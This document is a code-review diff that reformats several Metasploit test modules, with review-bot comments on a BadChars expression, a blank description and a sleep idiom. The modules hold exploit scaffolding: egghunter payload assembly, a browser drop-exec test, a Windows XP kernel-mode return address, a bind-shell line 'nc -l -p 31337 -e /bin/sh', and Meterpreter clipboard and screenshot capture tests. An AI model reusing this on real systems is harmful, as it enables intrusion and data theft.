'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[
|
||||||
[ 'Windows',
|
'Windows',
|
||||||
{
|
{
|
||||||
'Platform' => 'win'
|
'Platform' => 'win'
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
|
|
||||||
[ 'Linux',
|
[
|
||||||
|
'Linux',
|
||||||
{
|
{
|
||||||
'Platform' => 'linux'
|
'Platform' => 'linux'
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
|
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
@ -57,20 +59,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
||||||
print_status("Sending #{payload.encoded.length} byte payload...")
|
print_status("Sending #{payload.encoded.length} byte payload...")
|
||||||
|
|
||||||
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
|
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
|
||||||
:checksum => true
|
:checksum => true
|
||||||
})
|
})
|
||||||
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
|
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
|
||||||
|
|
||||||
sploit = ''
|
sploit = ''
|
||||||
|
|
||||||
# break before?
|
# break before?
|
||||||
#sploit << "\xcc"
|
# sploit << "\xcc"
|
||||||
sploit << eh_stub
|
sploit << eh_stub
|
||||||
# just return otherwise
|
# just return otherwise
|
||||||
sploit << "\xc3"
|
sploit << "\xc3"
|
||||||
|
|
|
@ -3,47 +3,45 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Explib2 Drop Exec Test Case",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module allows to test integration of Explib2 into metasploit.
|
'Name' => "Explib2 Drop Exec Test Case",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
This module allows to test integration of Explib2 into metasploit.
|
||||||
'Author' =>
|
},
|
||||||
[
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
'guhe120', # Original explib2 author
|
'guhe120', # Original explib2 author
|
||||||
'juan vazquez'
|
'juan vazquez'
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
||||||
],
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' => {
|
||||||
{
|
:source => /script/i,
|
||||||
:source => /script/i,
|
|
||||||
:os_name => OperatingSystems::WINDOWS,
|
:os_name => OperatingSystems::WINDOWS,
|
||||||
:ua_name => HttpClients::IE,
|
:ua_name => HttpClients::IE,
|
||||||
:ua_ver => '11.0'
|
:ua_ver => '11.0'
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[ 'Automatic', {} ]
|
||||||
[ 'Automatic', { } ]
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2014-03-28',
|
'DisclosureDate' => '2014-03-28',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_html
|
def exploit_html
|
||||||
|
|
||||||
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
|
exe_js = Rex::Text.to_unescape(generate_payload_exe, ENDIAN_LITTLE, "\\u")
|
||||||
|
|
||||||
template = %Q|<html>
|
template = %Q|<html>
|
||||||
|
|
|
@ -3,42 +3,41 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Explib2 Exec Test Case",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module allows to test integration of Explib2 into metasploit.
|
'Name' => "Explib2 Exec Test Case",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
This module allows to test integration of Explib2 into metasploit.
|
||||||
'Author' =>
|
},
|
||||||
[
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
'guhe120', # Original explib2 author
|
'guhe120', # Original explib2 author
|
||||||
'juan vazquez'
|
'juan vazquez'
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
[ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
|
||||||
],
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' => {
|
||||||
{
|
:source => /script/i,
|
||||||
:source => /script/i,
|
|
||||||
:os_name => OperatingSystems::WINDOWS,
|
:os_name => OperatingSystems::WINDOWS,
|
||||||
:ua_name => HttpClients::IE,
|
:ua_name => HttpClients::IE,
|
||||||
:ua_ver => '11.0'
|
:ua_ver => '11.0'
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[ 'Automatic', {} ]
|
||||||
[ 'Automatic', { } ]
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2014-03-28',
|
'DisclosureDate' => '2014-03-28',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_html
|
def exploit_html
|
||||||
|
|
|
@ -3,51 +3,50 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'MIPS Aggressive Test Exploit',
|
update_info(
|
||||||
'Description' => 'This module tests the exploitation of a test service',
|
info,
|
||||||
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
|
'Name' => 'MIPS Aggressive Test Exploit',
|
||||||
'License' => MSF_LICENSE,
|
'Description' => 'This module tests the exploitation of a test service',
|
||||||
#'Arch' => ARCH_MIPSBE,
|
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
|
||||||
'Payload' =>
|
'License' => MSF_LICENSE,
|
||||||
{
|
# 'Arch' => ARCH_MIPSBE,
|
||||||
'MaxNops' => 0,
|
'Payload' => {
|
||||||
#'BadChars' => "\x00",
|
'MaxNops' => 0,
|
||||||
#'StackAdjustment' => -3500,
|
# 'BadChars' => "\x00",
|
||||||
|
# 'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
# Target 0: Universal
|
# Target 0: Universal
|
||||||
[
|
[
|
||||||
'Mips big endian',
|
'Mips big endian',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSBE
|
'Arch' => ARCH_MIPSBE
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Mips big endian cannot be encoded',
|
'Mips big endian cannot be encoded',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSBE,
|
'Arch' => ARCH_MIPSBE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
], [
|
], [
|
||||||
'Mips big endian encoder needed',
|
'Mips big endian encoder needed',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSBE,
|
'Arch' => ARCH_MIPSBE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00"
|
'BadChars' => "\x00"
|
||||||
}
|
}
|
||||||
|
@ -57,43 +56,44 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Mips little endian',
|
'Mips little endian',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSLE
|
'Arch' => ARCH_MIPSLE
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Mips little endian cannot be encoded',
|
'Mips little endian cannot be encoded',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSLE,
|
'Arch' => ARCH_MIPSLE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
], [
|
], [
|
||||||
'Mips little endian encoder needed',
|
'Mips little endian encoder needed',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSLE,
|
'Arch' => ARCH_MIPSLE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00"
|
'BadChars' => "\x00"
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
|
|
||||||
|
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
||||||
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
# Show disassembled payload for context encoder test
|
# Show disassembled payload for context encoder test
|
||||||
if target.name =~ /context encoder/
|
if target.name =~ /context encoder/
|
||||||
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
# puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
||||||
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
|
# FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
|
||||||
end
|
end
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
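Review bot: `(0..255).to_a.map { |x| x.chr }.to_s` in the two "cannot be encoded" targets does not build a 256-byte string on Ruby 1.9 and later, because `Array#to_s` returns the inspect form of the array. The resulting `BadChars` value contains only printable characters (brackets, quotes, escape sequences), so these targets may not force the encoder failure their names describe. `'BadChars' => (0..255).to_a.pack('C*')` yields every byte value exactly once. The expression occurs in both the big-endian and little-endian hunks of this section, and also in the "Cannot be encoded" target of the aggressive test module earlier in the commit.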
|
@ -8,30 +8,35 @@ require 'rex'
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
def initialize( info = {} )
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Exec',
|
update_info(
|
||||||
'Description' => %q{ },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Exec',
|
||||||
'Author' => [ 'egypt' ],
|
'Description' => %q{ },
|
||||||
'References' => [ ],
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => [ 'java', 'linux' ],
|
'Author' => [ 'egypt' ],
|
||||||
'Arch' => ARCH_JAVA,
|
'References' => [ ],
|
||||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
'Platform' => [ 'java', 'linux' ],
|
||||||
'Targets' =>
|
'Arch' => ARCH_JAVA,
|
||||||
[
|
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||||
[ 'Generic (Java Payload)', {
|
'Targets' => [
|
||||||
'Arch' => ARCH_JAVA,
|
[
|
||||||
'Platform' => 'java'
|
'Generic (Java Payload)', {
|
||||||
} ],
|
'Arch' => ARCH_JAVA,
|
||||||
[ 'Linux', {
|
'Platform' => 'java'
|
||||||
'Arch' => ARCH_X86,
|
}
|
||||||
'Platform' => 'linux'
|
],
|
||||||
} ],
|
[
|
||||||
|
'Linux', {
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'Platform' => 'linux'
|
||||||
|
}
|
||||||
|
],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
))
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -47,4 +52,3 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
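Review bot: `'Description' => %q{ }` is still blank after the reformat, and `'References' => [ ]` is empty, so nothing in the metadata says what this test module exercises. A one-sentence description of the behaviour under test would help anyone reading module listings or test output. I would write it from the `exploit` body, which lies outside this hunk, rather than from the name `'Exec'` alone.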
|
@ -1,28 +1,30 @@
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "IE Test for Javascript Libs",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
Tests Javascript hotness
|
'Name' => "IE Test for Javascript Libs",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
Tests Javascript hotness
|
||||||
'Author' => [ 'sinn3r' ],
|
},
|
||||||
'References' => [ [ 'URL', 'https://metasploit.com' ] ],
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'win',
|
'Author' => [ 'sinn3r' ],
|
||||||
'Targets' => [ [ 'Automatic', {} ] ],
|
'References' => [ [ 'URL', 'https://metasploit.com' ] ],
|
||||||
'Payload' =>
|
'Platform' => 'win',
|
||||||
{
|
'Targets' => [ [ 'Automatic', {} ] ],
|
||||||
'BadChars' => "\x00",
|
'Payload' => {
|
||||||
|
'BadChars' => "\x00",
|
||||||
'StackAdjustment' => -3500
|
'StackAdjustment' => -3500
|
||||||
},
|
},
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => '2013-04-01',
|
'DisclosureDate' => '2013-04-01',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_base64
|
def test_base64
|
||||||
|
@ -72,12 +74,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
# Change the following to a specific function
|
# Change the following to a specific function
|
||||||
js = test_base64
|
js = test_base64
|
||||||
|
|
||||||
|
|
||||||
html = %Q|
|
html = %Q|
|
||||||
<!doctype html>
|
<!doctype html>
|
||||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||||
|
@ -95,8 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
</html>
|
</html>
|
||||||
|
|
|
|
||||||
|
|
||||||
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
|
send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# This is a test exploit for testing kernel-mode payloads.
|
# This is a test exploit for testing kernel-mode payloads.
|
||||||
#
|
#
|
||||||
|
@ -14,39 +13,40 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::KernelMode
|
include Msf::Exploit::KernelMode
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Internal Kernel-mode Test Exploit',
|
update_info(
|
||||||
'Description' =>
|
info,
|
||||||
"This module tests the exploitation of a kernel-mode test service.",
|
'Name' => 'Internal Kernel-mode Test Exploit',
|
||||||
'Author' => 'skape',
|
'Description' => "This module tests the exploitation of a kernel-mode test service.",
|
||||||
'License' => MSF_LICENSE,
|
'Author' => 'skape',
|
||||||
'Arch' => 'x86',
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Arch' => 'x86',
|
||||||
{
|
'Payload' => {
|
||||||
'Space' => 1000,
|
'Space' => 1000,
|
||||||
'MaxNops' => 0,
|
'MaxNops' => 0,
|
||||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||||
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
|
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
[
|
[
|
||||||
'Windows XP SP2',
|
'Windows XP SP2',
|
||||||
{
|
{
|
||||||
'Ret' => 0x80502d7f, # jmp esp
|
'Ret' => 0x80502d7f, # jmp esp
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'ExtendedOptions' =>
|
'ExtendedOptions' =>
|
||||||
{
|
{
|
||||||
'Stager' => 'sud_syscall_hook',
|
'Stager' => 'sud_syscall_hook',
|
||||||
'Recovery' => 'spin'
|
'Recovery' => 'spin'
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
|
@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
udp_sock.put(buf)
|
udp_sock.put(buf)
|
||||||
|
|
||||||
select(nil,nil,nil,2)
|
select(nil, nil, nil, 2)
|
||||||
|
|
||||||
disconnect_udp
|
disconnect_udp
|
||||||
end
|
end
|
||||||
|
|
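Review bot: `select(nil, nil, nil, 2)` in the last hunk is used purely as a two-second delay, which is hard to recognise as one. `Rex.sleep(2)` (or plain `sleep(2)`) states the intent directly and behaves the same on current Ruby. The enclosing method starts outside the hunk, so check that nothing there depends on `select` specifically.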
|
@ -3,38 +3,39 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Command Test',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module tests cmd payloads by targeting (for example) a server
|
'Name' => 'Command Test',
|
||||||
like: nc -l -p 31337 -e /bin/sh
|
'Description' => %q{
|
||||||
},
|
This module tests cmd payloads by targeting (for example) a server
|
||||||
'Author' => 'egypt',
|
like: nc -l -p 31337 -e /bin/sh
|
||||||
'References' => [ ],
|
|
||||||
'DefaultOptions' => { },
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
},
|
},
|
||||||
'Platform' => 'unix',
|
'Author' => 'egypt',
|
||||||
'Arch' => ARCH_CMD,
|
'References' => [ ],
|
||||||
'Targets' =>
|
'DefaultOptions' => {},
|
||||||
[
|
'Payload' => {
|
||||||
[ 'Automatic Targeting', { } ],
|
},
|
||||||
|
'Platform' => 'unix',
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Automatic Targeting', {} ],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(31337),
|
Opt::RPORT(31337),
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
|
|
|
@ -9,13 +9,16 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Meterpreter cmd_exec test',
|
update_info(
|
||||||
'Description' => %q( This module will test the meterpreter cmd_exec API ),
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Meterpreter cmd_exec test',
|
||||||
'Platform' => ['windows', 'linux', 'unix'],
|
'Description' => %q( This module will test the meterpreter cmd_exec API ),
|
||||||
'SessionTypes' => ['meterpreter']
|
'License' => MSF_LICENSE,
|
||||||
))
|
'Platform' => ['windows', 'linux', 'unix'],
|
||||||
|
'SessionTypes' => ['meterpreter']
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_cmd_exec
|
def test_cmd_exec
|
||||||
|
@ -107,6 +110,5 @@ class MetasploitModule < Msf::Post
|
||||||
output == test_string
|
output == test_string
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
require 'rex'
|
require 'rex'
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
|
@ -9,23 +8,24 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Test Meterpreter ExtAPI Stuff',
|
update_info(
|
||||||
'Description' => %q{ This module will test Windows Extended API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Test Meterpreter ExtAPI Stuff',
|
||||||
'Author' => [ 'Ben Campbell'],
|
'Description' => %q{ This module will test Windows Extended API methods },
|
||||||
'Platform' => [ 'windows', ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'Author' => [ 'Ben Campbell'],
|
||||||
))
|
'Platform' => [ 'windows', ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Check the extension is loaded...
|
# Check the extension is loaded...
|
||||||
#
|
#
|
||||||
def setup
|
def setup
|
||||||
|
|
||||||
unless session.extapi
|
unless session.extapi
|
||||||
vprint_status("Loading extapi extension...")
|
vprint_status("Loading extapi extension...")
|
||||||
begin
|
begin
|
||||||
|
@ -60,9 +60,9 @@ class MetasploitModule < Msf::Post
|
||||||
it "should return clipboard jpg dimensions" do
|
it "should return clipboard jpg dimensions" do
|
||||||
ret = false
|
ret = false
|
||||||
|
|
||||||
#VK_PRINTSCREEN 154 Maybe needed on XP?
|
# VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||||
#VK_SNAPSHOT 44
|
# VK_SNAPSHOT 44
|
||||||
session.railgun.user32.keybd_event(44,0,0,0)
|
session.railgun.user32.keybd_event(44, 0, 0, 0)
|
||||||
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
||||||
|
|
||||||
clipboard = session.extapi.clipboard.get_data(false)
|
clipboard = session.extapi.clipboard.get_data(false)
|
||||||
|
@ -96,22 +96,22 @@ class MetasploitModule < Msf::Post
|
||||||
text = Rex::Text.rand_text_alphanumeric(1024)
|
text = Rex::Text.rand_text_alphanumeric(1024)
|
||||||
ret = session.extapi.clipboard.set_text(text)
|
ret = session.extapi.clipboard.set_text(text)
|
||||||
clipboard = session.extapi.clipboard.get_data(true)
|
clipboard = session.extapi.clipboard.get_data(true)
|
||||||
ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text)
|
ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text)
|
||||||
end
|
end
|
||||||
|
|
||||||
if session.railgun.user32
|
if session.railgun.user32
|
||||||
it "should download clipboard jpg data" do
|
it "should download clipboard jpg data" do
|
||||||
ret = false
|
ret = false
|
||||||
|
|
||||||
#VK_PRINTSCREEN 154 Maybe needed on XP?
|
# VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||||
#VK_SNAPSHOT 44
|
# VK_SNAPSHOT 44
|
||||||
session.railgun.user32.keybd_event(44,0,0,0)
|
session.railgun.user32.keybd_event(44, 0, 0, 0)
|
||||||
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
||||||
|
|
||||||
clipboard = session.extapi.clipboard.get_data(true)
|
clipboard = session.extapi.clipboard.get_data(true)
|
||||||
if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?)
|
if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?)
|
||||||
# JPG Magic Bytes
|
# JPG Magic Bytes
|
||||||
ret = (clipboard.first[:data][0,2] == "\xFF\xD8")
|
ret = (clipboard.first[:data][0, 2] == "\xFF\xD8")
|
||||||
end
|
end
|
||||||
|
|
||||||
ret
|
ret
|
||||||
|
@ -183,14 +183,14 @@ class MetasploitModule < Msf::Post
|
||||||
windows = session.extapi.window.enumerate(true, nil)
|
windows = session.extapi.window.enumerate(true, nil)
|
||||||
|
|
||||||
if windows && windows.any?
|
if windows && windows.any?
|
||||||
